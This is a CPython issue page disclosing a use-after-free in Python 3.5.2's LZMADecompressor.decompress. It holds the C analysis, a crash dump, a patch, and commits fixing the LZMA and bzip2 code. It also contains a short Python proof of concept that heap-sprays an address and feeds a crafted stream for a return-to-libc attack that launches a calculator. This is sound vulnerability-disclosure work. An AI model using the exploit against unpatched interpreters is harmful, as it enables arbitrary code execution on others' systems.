New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
LZMADecompressor.decompress Use After Free #72462
Comments
Python 3.5.2 suffers from a use after free vulnerability caused by the behavior of the LZMADecompressor.decompress method. The problem exists due to a dangling pointer created by an incomplete error path in the _lzma!decompress function. static PyObject *
decompress(Decompressor *d, uint8_t *data, size_t len, Py_ssize_t max_length)
{
char input_buffer_in_use;
PyObject *result;
lzma_stream *lzs = &d->lzs;
/* Prepend unconsumed input if necessary */
if (lzs->next_in != NULL) {
[...]
}
else {
lzs->next_in = data;
lzs->avail_in = len;
input_buffer_in_use = 0;
} result = decompress_buf(d, max_length);
if(result == NULL)
return NULL;
[...]
} When the function is first called, lzs->next_in is NULL, so it is set using the data argument. If the subsequent call to decompress_buf fails because the stream is malformed, the function returns while maintaining the current value for lzs->next_in. A couple returns later, the allocation pointed to by lzs->next_in (data) is freed: static PyObject *
_lzma_LZMADecompressor_decompress(Decompressor *self, PyObject *args, PyObject *kwargs)
{
PyObject *return_value = NULL;
static char *_keywords[] = {"data", "max_length", NULL};
Py_buffer data = {NULL, NULL};
Py_ssize_t max_length = -1; if (!PyArg_ParseTupleAndKeywords(args, kwargs, "y*|n:decompress", _keywords,
&data, &max_length))
goto exit;
return_value = _lzma_LZMADecompressor_decompress_impl(self, &data, max_length); exit:
/* Cleanup for data */
if (data.obj)
PyBuffer_Release(&data);
return return_value;
} At this point, any calls to decompress made to the same Decompressor instance (a typical use case--multiple calls may be necessary to decompress a single stream) will result in a memcpy to the dangling lzs->next_in pointer, and thus memory corruption. static PyObject *
decompress(Decompressor *d, uint8_t *data, size_t len, Py_ssize_t max_length)
{
char input_buffer_in_use;
PyObject *result;
lzma_stream *lzs = &d->lzs;
/* Prepend unconsumed input if necessary */
if (lzs->next_in != NULL) {
size_t avail_now, avail_total;
[...]
memcpy((void*)(lzs->next_in + lzs->avail_in), data, len);
lzs->avail_in += len;
input_buffer_in_use = 1;
}
else {
[...]
}
} This vulnerability can be exploited to achieve arbitrary code execution. In applications where untrusted LZMA streams are received over a network, it might be possible to exploit this vulnerability remotely. A simple proof of concept that demonstrates a return-to-libc attack is attached. import _lzma
from array import *
# System address when tested: 76064070
d = _lzma.LZMADecompressor()
spray = [];
for x in range(0, 0x700):
meg = bytearray(b'\x76\x70\x40\x06' * int(0x100000 / 4));
spray.append(meg)
def foo():
for x in range(0, 2):
try:
d.decompress(b"\x20\x26\x20\x63\x61\x6c\x63\x00\x41\x41\x41\x41\x41\x41\x41\x41" * int(0x100 / (4*4)))
except:
pass
foo()
print(len(spray[0]))
print(len(spray)) To fix the issue, it is recommended that lzs->next_in be zeroed in the event the call to decompress_buf fails. A proposed patch is attached. result = decompress_buf(d, max_length);
if(result == NULL) {
lzs->next_in = 0;
return NULL;
} A repro file is attached as well. Exception details: 0:000> r 0:000> !analyze -v -nodb
FAULTING_IP: EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff) CONTEXT: 00000000 -- (.cxr 0x0;r) FAULTING_THREAD: 000043fc DEFAULT_BUCKET_ID: INVALID_POINTER_WRITE PROCESS_NAME: python_d.exe ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_PARAMETER1: 00000001 EXCEPTION_PARAMETER2: 09275fe8 WRITE_ADDRESS: 09275fe8 FOLLOWUP_IP: NTGLOBALFLAG: 2000000 APPLICATION_VERIFIER_FLAGS: 0 APP: python_d.exe ANALYSIS_VERSION: 6.3.9600.17029 (debuggers(dbg).140219-1702) x86fre PRIMARY_PROBLEM_CLASS: INVALID_POINTER_WRITE BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_INVALID_POINTER_READ LAST_CONTROL_TRANSFER: from 5d573f80 to 6bf55149 STACK_TEXT: STACK_COMMAND: .cxr 0x0 ; kb FAULTING_SOURCE_LINE: f:\dd\vctools\crt\vcruntime\src\string\i386\memcpy.asm FAULTING_SOURCE_FILE: f:\dd\vctools\crt\vcruntime\src\string\i386\memcpy.asm FAULTING_SOURCE_LINE_NUMBER: 658 SYMBOL_STACK_INDEX: 0 SYMBOL_NAME: vcruntime140d!TrailingDownVec+1f9 FOLLOWUP_NAME: MachineOwner MODULE_NAME: VCRUNTIME140D IMAGE_NAME: VCRUNTIME140D.dll DEBUG_FLR_IMAGE_TIMESTAMP: 558ce3d5 FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_c0000005_VCRUNTIME140D.dll!TrailingDownVec BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_WRITE_INVALID_POINTER_READ_vcruntime140d!TrailingDownVec+1f9 ANALYSIS_SOURCE: UM FAILURE_ID_HASH_STRING: um:invalid_pointer_write_c0000005_vcruntime140d.dll!trailingdownvec FAILURE_ID_HASH: {935a9c66-b210-2678-8c10-c746a999bfb6} Followup: MachineOwner |
Thanks John. Could you please add a test based on your reproducer? |
Of course. Attached is a new patch that includes test coverage. It crashes on failure as there isn't any reasonable way to monitor for this kind of undefined behavior, but it's better than nothing. |
New changeset b4c0e733b342 by Serhiy Storchaka in branch '3.5': New changeset 52f8eb2fa6a6 by Serhiy Storchaka in branch '3.6': New changeset 6117d0e1a5c9 by Serhiy Storchaka in branch 'default': |
Committed with small changes. Thank you John for your contribution. Tested that 3.4 is not affected. |
Here is a patch to fix the corresponding bug in the bzip decompressor. I will try to commit it soon if there are no objections. For the record, these bugs were introduced with the max_length support in bpo-15955. The bzip code was modelled after the LZMA code. |
LGTM. And may be worth to rewrite lzma test in your style. |
New changeset 36d37ff6c236 by Martin Panter in branch '3.5': New changeset dca18f0ec280 by Martin Panter in branch '3.6': New changeset 35b5f4cc08f4 by Martin Panter in branch 'default': |
Misc/NEWS
so that it is managed by towncrier #552Note: these values reflect the state of the issue at the time it was migrated and might not reflect the current state.
Show more details
GitHub fields:
bugs.python.org fields:
The text was updated successfully, but these errors were encountered: